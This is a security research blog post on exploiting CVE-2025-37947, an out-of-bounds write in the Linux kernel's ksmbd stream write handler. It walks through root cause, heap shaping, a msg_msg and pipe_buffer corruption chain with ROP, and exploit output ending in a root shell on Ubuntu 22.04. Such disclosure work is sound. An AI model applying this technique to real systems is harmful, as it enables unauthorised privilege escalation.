ksmbd - Exploiting CVE-2025-37947 (3/3)

08 Oct 2025 - Posted by Norbert Szetei

Introduction

This is the last of our posts about ksmbd. For the previous posts, see part1 and part2.

Considering all discovered bugs and proof-of-concept exploits we reported, we had to select some suitable candidates for exploitation. In particular, we wanted to use something reported more recently to avoid downgrading our working environment.

We first experimented with several use-after-free (UAF) bugs, since this class of bugs has a reputation for almost always being exploitable, as proven in numerous articles. However, many of them required race conditions and specific timing, so we postponed them in favor of bugs with more reliable or deterministic exploitation paths.

Then there were bugs that depended on factors outside user control, or that had peculiar behavior. Let’s first look at CVE-2025-22041, which we initially intended to use. Due to missing locking, it’s possible to invoke the ksmbd_free_user function twice:

void ksmbd_free_user(struct ksmbd_user *user)

{

ksmbd_ipc_logout_request(user->name, user->flags);

kfree(user->name);

kfree(user->passkey);

kfree(user);

}

In this double-free scenario, an attacker has to replace user->name with another object, so it can be freed the second time. The problem is that the kmalloc cache size depends on the size of the username. If it is slightly longer than 8 characters, it will fit into kmalloc-16 instead of kmalloc-8, which means different exploitation techniques are required, depending on the username length.
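
To make the size dependency concrete, here is a minimal sketch of how a request size maps to a generic kmalloc cache. The helper name kmalloc_bucket is hypothetical and the model is simplified: it covers only the power-of-two classes plus the 96- and 192-byte caches, and it takes the allocation size in bytes, so whether a terminating NUL is counted is left to the caller.

```c
#include <stddef.h>

/*
 * Simplified model of the generic kmalloc size classes (hypothetical helper,
 * not kernel code): 96- and 192-byte caches are handled explicitly, every
 * other request is rounded up to the next power of two, starting at 8 bytes.
 */
size_t kmalloc_bucket(size_t size)
{
    size_t bucket = 8;

    if (size > 64 && size <= 96)
        return 96;
    if (size > 128 && size <= 192)
        return 192;
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}
```

Under this model an 8-byte request stays in kmalloc-8 while a 9-byte request already moves to kmalloc-16, so the object needed to reclaim the freed user->name changes with the username.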

Hence we decided to take a look at CVE-2025-37947, which seemed promising from the start. We considered remote exploitation by combining the bug with an infoleak, but we lacked a primitive such as a writeleak, and we were not aware of any such bug having been reported in the last year. Even so, as mentioned, we restricted ourselves to bugs we had discovered.

This bug alone appeared to offer the capabilities we needed to bypass common mitigations (e.g., KASLR, SMAP, SMEP, and several Ubuntu kernel hardening options such as HARDENED_USERCOPY). So, due to additional time constraints, we ended up focusing on a local privilege escalation only. Note that at the time of writing this post, we implemented the exploit on Ubuntu 22.04.5 LTS with the latest kernel (5.15.0-153-generic) that was still vulnerable.

Root cause analysis

The finding requires the streams_xattr module to be enabled in the vfs objects configuration option and can be triggered by an authenticated user. In addition, a writable share must be added to the default configuration as follows:

[share]

path = /share

vfs objects = streams_xattr

writeable = yes

Here is the vulnerable code, with a few unrelated lines removed that do not affect the bug’s logic:

// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411

static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,

size_t count)

{

char *stream_buf = NULL, *wbuf;

struct mnt_idmap *idmap = file_mnt_idmap(fp->filp);

size_t size;

ssize_t v_len;

int err = 0;

ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",

*pos, count);

size = *pos + count;

if (size > XATTR_SIZE_MAX) { // [1]

size = XATTR_SIZE_MAX;

count = (*pos + count) - XATTR_SIZE_MAX;

}

wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2]

stream_buf = wbuf;

memcpy(&stream_buf[*pos], buf, count); // [3]

// .. snip

if (err < 0)

goto out;

fp->filp->f_pos = *pos;

err = 0;

out:

kvfree(stream_buf);

return err;

}

The maximum size of an extended attribute value, XATTR_SIZE_MAX, is 65536 bytes (0x10000), or 16 pages assuming a common page size of 0x1000 bytes. We can see at [1] that if the sum of the position and the count exceeds this value, the size is truncated to 0x10000 and that amount is allocated at [2]. The position itself is never checked against the size of the buffer.

Hence, we can set the position to 0x10000 and count to 0x8, and memcpy(&stream_buf[0x10000], buf, 8) will write 8 bytes of user-controlled data out of bounds at [3]. Note that we can also shift the position to control the offset of the write; for instance, the value 0x10010 writes at offset 16 past the end of the buffer. However, the number of bytes copied (count) is then incremented by 16 as well, so we end up copying 24 bytes, potentially corrupting more data. This is often not desired, depending on the alignment we can achieve.
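
The arithmetic can be replayed in userland. The following is a sketch that mirrors only the clamping logic at [1]; the struct, the function name plan_stream_write, and the constant XATTR_MAX_BYTES (standing in for XATTR_SIZE_MAX) are hypothetical names introduced for illustration.

```c
#include <stdint.h>

#define XATTR_MAX_BYTES 65536ULL /* stands in for XATTR_SIZE_MAX */

struct stream_write_plan {
    uint64_t alloc_size; /* size passed to kvmalloc() at [2] */
    uint64_t copy_len;   /* length passed to memcpy() at [3] */
    uint64_t oob_offset; /* distance of the first stray byte from the buffer end */
    uint64_t oob_bytes;  /* bytes written past the end of the buffer */
};

/* Replays the size/count computation and reports where the copy lands. */
struct stream_write_plan plan_stream_write(uint64_t pos, uint64_t count)
{
    struct stream_write_plan p = {0};
    uint64_t end, first_oob;

    p.alloc_size = pos + count;
    p.copy_len = count;
    if (p.alloc_size > XATTR_MAX_BYTES) { /* [1] */
        p.alloc_size = XATTR_MAX_BYTES;
        p.copy_len = (pos + count) - XATTR_MAX_BYTES;
    }

    end = pos + p.copy_len; /* one past the last byte written */
    if (end > p.alloc_size) {
        first_oob = pos > p.alloc_size ? pos : p.alloc_size;
        p.oob_offset = first_oob - p.alloc_size;
        p.oob_bytes = end - first_oob;
    }
    return p;
}
```

For pos = 0x10000 and count = 8 this reports 8 stray bytes at offset 0, and for pos = 0x10010 it reports 24 bytes starting at offset 16, matching the two cases described above.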

Proof of Concept

To demonstrate that the vulnerability is reachable, we wrote a minimal proof of concept (PoC). This PoC only triggers the bug - it does not escalate privileges. Additionally, after changing the permissions of /proc/pagetypeinfo to be readable by an unprivileged user, it can be used to confirm the buffer allocation order. The PoC code authenticates using smbuser/smbpassword credentials via the libsmb2 library and uses the same socket as the connection to send the vfs stream data with user-controlled attributes.

Specifically, we set file_offset to 0x0000010018ULL and length_wr to 8, writing 32 bytes filled with 0xaa and 0xbb patterns for easy recognition.

If we run the PoC, print the allocation address, and break on memcpy, we can confirm the OOB write:

(gdb) c

Continuing.

ksmbd_vfs_stream_write+310 allocated: ffff8881056b0000

Thread 2 hit Breakpoint 2, 0xffffffffc06f4b39 in memcpy (size=32,

q=0xffff8881031b68fc, p=0xffff8881056c0018)

at /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h:191

warning: 191 /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h: No such file or directory

(gdb) x/2xg $rsi

0xffff8881031b68fc: 0xaaaaaaaaaaaaaaaa 0xbbbbbbbbbbbbbbbb

Heap Shaping for kvzalloc

On Linux, physical memory is managed in pages (usually 4KB), and the page allocator (buddy allocator) organizes them in power-of-two blocks called orders. Order 0 is a single page, order 1 is 2 contiguous pages, order 2 is 4 pages, and so on. This allows the kernel to efficiently allocate and merge contiguous page blocks.
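
As a quick illustration of the order arithmetic, the sketch below computes the smallest order that covers a request, assuming 4 KB pages. The names PG_SHIFT, pages_in_order, and order_for_size are hypothetical; the kernel's own helper for this is get_order().

```c
#include <stddef.h>

#define PG_SHIFT 12                 /* assumed 4 KB pages */
#define PG_SIZE  (1UL << PG_SHIFT)

/* Number of contiguous pages in a block of the given order. */
unsigned long pages_in_order(unsigned int order)
{
    return 1UL << order;
}

/* Smallest order whose block is large enough to hold `size` bytes. */
unsigned int order_for_size(size_t size)
{
    size_t pages = (size + PG_SIZE - 1) >> PG_SHIFT;
    unsigned int order = 0;

    while (pages_in_order(order) < pages)
        order++;
    return order;
}
```

A 0x10000-byte request needs 16 pages and therefore maps to order 4, while a single byte more would already require an order-5 block.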

With that, we have to take a look at how exactly the memory is allocated via kvzalloc. The function is just a wrapper around kvmalloc that returns a zeroed page:

// https://elixir.bootlin.com/linux/v5.15/source/include/linux/mm.h#L811

static inline void *kvzalloc(size_t size, gfp_t flags)

{

return kvmalloc(size, flags | __GFP_ZERO);

}

Then the function calls kvmalloc_node, attempting to allocate physically contiguous memory using kmalloc, and if that fails, it falls back to vmalloc to obtain memory that only needs to be virtually contiguous. We were not trying to create memory pressure to exploit the latter allocation mechanism, so we can assume the function behaves like kmalloc().

Since Ubuntu uses the SLUB allocator for kmalloc by default, it follows with __kmalloc_node. That function serves a request from the kmalloc_caches slabs only if it does not exceed KMALLOC_MAX_CACHE_SIZE, which has the value 8192 (two pages, i.e. an order-1 size).

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4424

void *__kmalloc_node(size_t size, gfp_t flags, int node)

{

struct kmem_cache *s;

void *ret;

if (unlikely(size > KMALLOC_MAX_CACHE_SIZE)) {

ret = kmalloc_large_node(size, flags, node);

trace_kmalloc_node(_RET_IP_, ret,

size, PAGE_SIZE << get_order(size),

flags, node);

return ret;

}

s = kmalloc_slab(size, flags);

if (unlikely(ZERO_OR_NULL_PTR(s)))

return s;

ret = slab_alloc_node(s, flags, node, _RET_IP_, size);

trace_kmalloc_node(_RET_IP_, ret, size, s->size, flags, node);

ret = kasan_kmalloc(s, ret, size, flags);

return ret;

}

For anything larger, the Linux kernel gets pages directly using the page allocator:

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4407

#ifdef CONFIG_NUMA

static void *kmalloc_large_node(size_t size, gfp_t flags, int node)

{

struct page *page;

void *ptr = NULL;

unsigned int order = get_order(size);

flags |= __GFP_COMP;

page = alloc_pages_node(node, flags, order);

if (page) {

ptr = page_address(page);

mod_lruvec_page_state(page, NR_SLAB_UNRECLAIMABLE_B,

PAGE_SIZE << order);

}

return kmalloc_large_node_hook(ptr, size, flags);

}

So, since we have to request 16 pages, we are dealing with buddy allocator page shaping, and we aim to overflow memory that follows an order-4 allocation. The question is what we can place there and how to ensure proper positioning.
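
The branch taken in __kmalloc_node can be summarized in a few lines. This is only a sketch of the size check shown above; the enum, the function name kmalloc_path_for, and the constant KMALLOC_MAX_CACHE_BYTES (standing in for KMALLOC_MAX_CACHE_SIZE) are hypothetical.

```c
#include <stddef.h>

#define KMALLOC_MAX_CACHE_BYTES 8192UL /* stands in for KMALLOC_MAX_CACHE_SIZE */

enum kmalloc_path {
    KMALLOC_FROM_SLAB,  /* served by a kmalloc_caches slab */
    KMALLOC_FROM_PAGES  /* served directly by the page allocator */
};

/* Mirrors the size check at the top of __kmalloc_node(). */
enum kmalloc_path kmalloc_path_for(size_t size)
{
    return size > KMALLOC_MAX_CACHE_BYTES ? KMALLOC_FROM_PAGES
                                          : KMALLOC_FROM_SLAB;
}
```

The 0x10000-byte stream_buf takes the page allocator path, whereas a 4096-byte object is still served from a slab cache, which is why the neighbor of stream_buf is decided by the buddy allocator rather than by slab placement.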

A key constraint is that memcpy() happens immediately after the allocation. This rules out spraying after allocation. Therefore, we must create a 16-page contiguous free space in memory in advance, so that kvzalloc() places stream_buf in that region. This way, the out-of-bounds write hits a controlled and useful target object.

There are various objects that could be allocated in kernel memory, but most common ones use kmalloc caches. So we investigated which could be a good fit, where the order value indicates the page order used for allocating slabs that hold those objects:

$ for i in /sys/kernel/slab/*/order; do \

sudo cat $i | tr -d '\n'; echo " -> $i"; \

done | sort -rn | head

3 -> /sys/kernel/slab/UDPv6/order

3 -> /sys/kernel/slab/UDPLITEv6/order

3 -> /sys/kernel/slab/TCPv6/order

3 -> /sys/kernel/slab/TCP/order

3 -> /sys/kernel/slab/task_struct/order

3 -> /sys/kernel/slab/sighand_cache/order

3 -> /sys/kernel/slab/sgpool-64/order

3 -> /sys/kernel/slab/sgpool-128/order

3 -> /sys/kernel/slab/request_queue/order

3 -> /sys/kernel/slab/net_namespace/order

We see that slab caches use pages of order 3 at most. Based on that, our choice became kmalloc-cg-4k (not shown in the output), which we can easily spray. It is versatile for achieving various exploitation primitives, such as arbitrary read, write, or in some cases, even UAF.

After experimenting with order-3 page allocations and checking /proc/pagetypeinfo, we confirmed that there are 5 freelists per order, per zone. In our case, zone Normal is used, and GFP_KERNEL prefers the Unmovable migrate type, so we can ignore the others:

$ sudo cat /proc/pagetypeinfo

Page block order: 9

Pages per block: 512

Free pages count per migrate type at order 0 1 2 3 4 5 6 7 8 9 10

Node 0, zone DMA, type Unmovable 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA, type Movable 0 0 0 0 0 0 0 0 0 1 3

Node 0, zone DMA, type Reclaimable 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA, type HighAtomic 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA, type Isolate 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA32, type Unmovable 0 0 0 0 0 0 0 1 0 1 0

Node 0, zone DMA32, type Movable 2 2 1 1 0 3 3 3 2 3 730

Node 0, zone DMA32, type Reclaimable 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA32, type HighAtomic 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone DMA32, type Isolate 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone Normal, type Unmovable 69 30 7 9 3 1 30 63 37 28 36

Node 0, zone Normal, type Movable 37 7 3 5 5 3 5 2 2 4 1022

Node 0, zone Normal, type Reclaimable 3 2 1 2 1 0 0 0 0 1 0

Node 0, zone Normal, type HighAtomic 0 0 0 0 0 0 0 0 0 0 0

Node 0, zone Normal, type Isolate 0 0 0 0 0 0 0 0 0 0 0

Number of blocks type Unmovable Movable Reclaimable HighAtomic Isolate

Node 0, zone DMA 1 7 0 0 0

Node 0, zone DMA32 2 1526 0 0 0

Node 0, zone Normal 182 2362 16 0 0

The output shows 9 free elements for order-3 and 3 for order-4. By calling kvmalloc(0x10000, GFP_KERNEL | __GFP_ZERO), we can double-check that the number of order-4 elements is decremented. We can compare the state before and after the allocation:

Free pages count per migrate type at order 0 1 2 3 4 5 6 7 8 9 10

Node 0, zone Normal, type Unmovable 843 592 178 14 6 7 4 47 45 26 32

Node 0, zone Normal, type Unmovable 843 592 178 14 5 7 4 47 45 26 32
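
Such a before/after comparison can be automated by extracting a single column from a /proc/pagetypeinfo line. The parser below is a minimal sketch; the function name free_blocks_at_order is hypothetical, and it assumes the line layout shown in the output above (the word "type", the migrate type name, then one count per order).

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/*
 * Extracts the free-block count for `order` from one pagetypeinfo line.
 * Returns 0 and stores the count in *out on success, -1 if the line has
 * no "type" field or fewer columns than requested.
 */
int free_blocks_at_order(const char *line, unsigned int order,
                         unsigned long *out)
{
    const char *p = strstr(line, "type");
    char *end;
    unsigned int i;

    if (!p)
        return -1;
    p += strlen("type");
    while (*p && isspace((unsigned char)*p))  /* padding before the type name */
        p++;
    while (*p && !isspace((unsigned char)*p)) /* the migrate type name itself */
        p++;

    for (i = 0; ; i++) {
        unsigned long v = strtoul(p, &end, 10);

        if (end == p)
            return -1; /* ran out of numeric columns */
        if (i == order) {
            *out = v;
            return 0;
        }
        p = end;
    }
}
```

Reading the Normal/Unmovable line before and after the allocation and comparing the order-4 column would show the drop from 6 to 5 seen above.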

When the allocator runs out of order-3 and order-4 blocks, it starts splitting higher-order blocks - like order-5 - to satisfy new requests. This splitting is recursive: an order-5 block becomes two order-4 blocks, one of which is then split again if needed.

In our scenario, once we exhaust all order-3 and order-4 freelist entries, the allocator pulls an order-5 block. One half is split to satisfy a lower-order allocation - our target order-3 object. The other half remains a free order-4 block and can later be used by kvzalloc for the stream_buf.

Even though this layout is not guaranteed, repeating this several times gives us a relatively high probability of a scenario where an order-3 slab page holding our objects sits directly after the stream_buf allocation, allowing us to corrupt its memory through the out-of-bounds write.
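
The splitting step can be modeled in a few lines. The sketch below is a simplified model of how the buddy allocator breaks a larger block down: the lowest part goes to the caller and each upper half is returned to a freelist. It ignores migrate types and per-CPU lists, and the names free_block and split_block are hypothetical.

```c
#include <stddef.h>

struct free_block {
    unsigned long pfn;  /* first page frame number of the block */
    unsigned int order;
};

/*
 * Splits a free block of order `high` starting at `pfn` down to order `low`.
 * The caller keeps [pfn, pfn + (1 << low)); every upper half produced on the
 * way is recorded in `freed`, largest first. Returns the number of recorded
 * blocks (0 if nothing was split, the orders are inconsistent, or `freed`
 * is too small).
 */
size_t split_block(unsigned long pfn, unsigned int high, unsigned int low,
                   struct free_block *freed, size_t cap)
{
    unsigned long size = 1UL << high;
    size_t n = 0;

    if (low > high || (size_t)(high - low) > cap)
        return 0;
    while (high > low) {
        high--;
        size >>= 1;
        freed[n].pfn = pfn + size; /* upper half goes back to a freelist */
        freed[n].order = high;
        n++;
    }
    return n;
}
```

Splitting an order-5 block at page 0 for an order-3 request hands out pages 0-7, leaves pages 8-15 as a free order-3 block, and leaves pages 16-31 as a free order-4 block. Whatever occupies the pages that follow such an order-4 block is what a write past its end would reach.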







By allocating 1024 messages (msg_msg), with a message size of 4096 to fit into kmalloc-cg-4k, we obtained the following layout centered around stream_buf at 0xffff8881117b0000, where the red strip marks the target pages and the blue represents msg_msg objects:

When we zoomed in, we confirmed that it is indeed possible to place stream_buf before one of the messages:

Note that the probability of overwriting the victim object was significantly improved by receiving messages and creating holes. However, in a minority of cases - less than 10% in our results - the exploit failed.
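
To pick message sizes that land in a specific cache, it helps to account for the msg_msg header. The sketch below assumes 4 KB pages and x86_64 structure sizes (48 bytes for struct msg_msg, 8 bytes for struct msg_msgseg); the struct and the function name msg_layout_for are hypothetical.

```c
#include <stddef.h>

#define PAGE_BYTES     4096UL
#define MSG_MSG_HDR    48UL /* assumed sizeof(struct msg_msg) on x86_64 */
#define MSG_MSGSEG_HDR 8UL  /* assumed sizeof(struct msg_msgseg) on x86_64 */

struct msg_layout {
    size_t primary_alloc; /* bytes requested for the primary msg_msg */
    size_t segments;      /* number of follow-up msg_msgseg allocations */
};

/* Computes the allocations needed for a message with `payload_len` bytes. */
struct msg_layout msg_layout_for(size_t payload_len)
{
    const size_t primary_max = PAGE_BYTES - MSG_MSG_HDR;    /* 4048 */
    const size_t segment_max = PAGE_BYTES - MSG_MSGSEG_HDR; /* 4088 */
    struct msg_layout l;
    size_t in_primary = payload_len < primary_max ? payload_len : primary_max;
    size_t rest = payload_len - in_primary;

    l.primary_alloc = MSG_MSG_HDR + in_primary;
    l.segments = (rest + segment_max - 1) / segment_max;
    return l;
}
```

Under these assumptions a payload of 4048 bytes yields a single 4096-byte allocation with no segments, which is the size that fits kmalloc-cg-4k exactly.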

This can occur when we overwrite different objects, depending on the state of ksmbd or external processes. Unfortunately, with some probability, this can also result in kernel panic.

Exploitation Strategy

After being able to trigger the OOB write, the local escalation becomes almost straightforward. We tried several approaches, such as corrupting the next pointer in a segmented msg_msg, described in detail here. However, using this method there was no easy way to obtain a KASLR leak, and we did not want to rely on side-channel attacks such as Retbleed. Therefore, we had to revisit our strategy.

The one from the near-canonical write-up CVE-2021-22555: Turning \x00\x00 into 10000$ was the best fit. Because we overwrote physical pages instead of Slab objects, we did not have to deal with cross-cache attacks introduced by accounting, and the post-exploitation phase required only a few modifications.

First, we confirmed the addresses of the allocations via a bpf script to ensure that they are properly aligned.

$ sudo ./bpf-tracer.sh

...

$ grep 4048 out-4096.txt | egrep ".... total" -o | sort | uniq -c

511 0000 total

510 1000 total

511 2000 total

512 3000 total

511 4000 total

511 5000 total

511 6000 total

511 7000 total

513 8000 total

513 9000 total

513 a000 total

513 b000 total

513 c000 total

513 d000 total

513 e000 total

513 f000 total

Our choice to create a collision by overwriting the two least significant bytes with \x05\x00 was somewhat arbitrary. After that, we just re-implemented all the stages, and we were even able to find similar ROP gadgets for stack pivoting.

We strongly recommend reading the original article to make all steps clear, as it provides the missing information which we did not want to repeat here.

With that in place, the exploit flow was the following:

- Allocate many msg_msg objects in the kernel.

- Trigger an OOB write in ksmbd to allocate stream_buf, and overwrite the primary message’s next pointer so two primary messages point to the same secondary message.

- Detect the corrupted pair by tagging every message with its queue index and scanning queues with msgrcv(MSG_COPY) to find mismatched tags.

- Free the real secondary message (from the real queue) to create a use-after-free - the fake queue still holds a stale pointer to the freed buffer.

- Spray userland objects over the freed slot via UNIX sockets so we can reclaim the freed memory with controlled data by crafting a fake msg_msg.

- Abuse m_ts to leak kernel memory: craft the fake msg_msg so copy_msg returns more data than intended and read adjacent headers and pointers to leak kernel heap addresses for mlist.next and mlist.prev.

- With the help of an sk_buff spray, rebuild the fake msg_msg with correct mlist.next and mlist.prev so it can be unlinked and freed normally.

- Spray and reclaim that UAF with struct pipe_buffer objects so we can leak anon_pipe_buf_ops and compute the kernel base to bypass KASLR.

- Create a fake pipe_buf_operations structure by spraying skbuff the second time, with the release operation pointer that points into crafted gadget sequences.

- Trigger the release callbacks by closing pipes - this starts the ROP chain with stack pivoting.
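
The detection step in the flow above boils down to a simple scan. The sketch below is a userland model only: it assumes the tags have already been read back from every queue with msgrcv(MSG_COPY) into an array, and the function name find_corrupted_pair is hypothetical.

```c
#include <stddef.h>

/*
 * tags[i] is the queue index stored in the message read back from queue i.
 * In an uncorrupted state tags[i] == i for every queue. A mismatch means
 * queue i (the "fake" queue) now references the message that belongs to
 * queue tags[i] (the "real" queue).
 * Returns 1 and fills fake_idx/real_idx for the first mismatch, 0 otherwise.
 */
int find_corrupted_pair(const unsigned int *tags, size_t nqueues,
                        size_t *fake_idx, size_t *real_idx)
{
    size_t i;

    for (i = 0; i < nqueues; i++) {
        if (tags[i] != i) {
            *fake_idx = i;
            *real_idx = tags[i];
            return 1;
        }
    }
    return 0;
}
```

A real exploit would additionally have to handle tags that fall outside the range of sprayed queues, which can happen when the overwritten pointer ends up referencing an unrelated object.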

Final Exploit

The final exploit is available here; it may require several attempts:

...

[+] STAGE 1: Memory corruption

[*] Spraying primary messages...

[*] Spraying secondary messages...

[*] Creating holes in primary messages...

[*] Triggering out-of-bounds write...

[*] Searching for corrupted primary message...

[-] Error could not corrupt any primary message.

[ ] Attempt: 3

[+] STAGE 1: Memory corruption

[*] Spraying primary messages...

[*] Spraying secondary messages...

[*] Creating holes in primary messages...

[*] Triggering out-of-bounds write...

[*] Searching for corrupted primary message...

[+] fake_idx: 1a00

[+] real_idx: 1a08

[+] STAGE 2: SMAP bypass

[*] Freeing real secondary message...

[*] Spraying fake secondary messages...

[*] Leaking adjacent secondary message...

[+] kheap_addr: ffff8f17c6e88000

[*] Freeing fake secondary messages...

[*] Spraying fake secondary messages...

[*] Leaking primary message...

[+] kheap_addr: ffff8f17d3bb5000

[+] STAGE 3: KASLR bypass

[*] Freeing fake secondary messages...

[*] Spraying fake secondary messages...

[*] Freeing sk_buff data buffer...

[*] Spraying pipe_buffer objects...

[*] Leaking and freeing pipe_buffer object...

[+] anon_pipe_buf_ops: ffffffffa3242700

[+] kbase_addr: ffffffffa2000000

[+] leaked kslide: 21000000

[+] STAGE 4: Kernel code execution

[*] Releasing pipe_buffer objects...

[*] Returned to userland

# id

uid=0(root) gid=0(root) groups=0(root)

# uname -a

Linux target22 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

Note that reliability could still be improved, because we did not try to find optimal values for the number of sprayed-and-freed objects used for corruption. We arrived at the values experimentally and obtained satisfactory results.
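
The KASLR numbers in the log can be reproduced with simple pointer arithmetic. In the sketch below, the symbol offset is derived from the run shown above (anon_pipe_buf_ops minus kbase_addr) and is specific to that kernel build; the unslid base 0xffffffff81000000 is an assumption that is consistent with the reported kslide, and the function names are hypothetical.

```c
#include <stdint.h>

/* Derived from the log above: 0xffffffffa3242700 - 0xffffffffa2000000. */
#define ANON_PIPE_BUF_OPS_OFFSET 0x1242700ULL
/* Assumed unslid x86_64 kernel text base. */
#define DEFAULT_KERNEL_BASE      0xffffffff81000000ULL

/* Kernel base computed from a leaked anon_pipe_buf_ops pointer. */
uint64_t kernel_base_from_leak(uint64_t anon_pipe_buf_ops)
{
    return anon_pipe_buf_ops - ANON_PIPE_BUF_OPS_OFFSET;
}

/* KASLR slide relative to the assumed default base. */
uint64_t kaslr_slide(uint64_t kernel_base)
{
    return kernel_base - DEFAULT_KERNEL_BASE;
}
```

Gadget addresses taken from an unslid kernel image would then be relocated by adding the slide before they are placed into the ROP chain.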

Conclusion

We successfully demonstrated the exploitability of the bug in ksmbd on the latest Ubuntu 22.04 LTS using the default configuration and enabling the ksmbd service. A full exploit to achieve local root escalation was also developed.

A flaw in ksmbd_vfs_stream_write() allows out-of-bounds writes when pos exceeds XATTR_SIZE_MAX, enabling corruption of adjacent pages with kernel objects. Local exploitation can reliably escalate privileges. Remote exploitation is considerably more challenging: an attacker would be constrained to the code paths and objects exposed by ksmbd, and a successful remote attack would additionally require an information leak to defeat KASLR and make the heap grooming reliable.

References

- Andy Nguyen - CVE-2021-22555: Turning \x00\x00 into 10000$

- Matthew Ruffell - Looking at kmalloc() and the SLUB Memory Allocator

- sam4k - Linternals series (Memory Allocators/Memory Management)

- corCTF 2021 Fire of Salvation Writeup: Utilizing msg_msg Objects for Arbitrary Read and Arbitrary Write in the Linux Kernel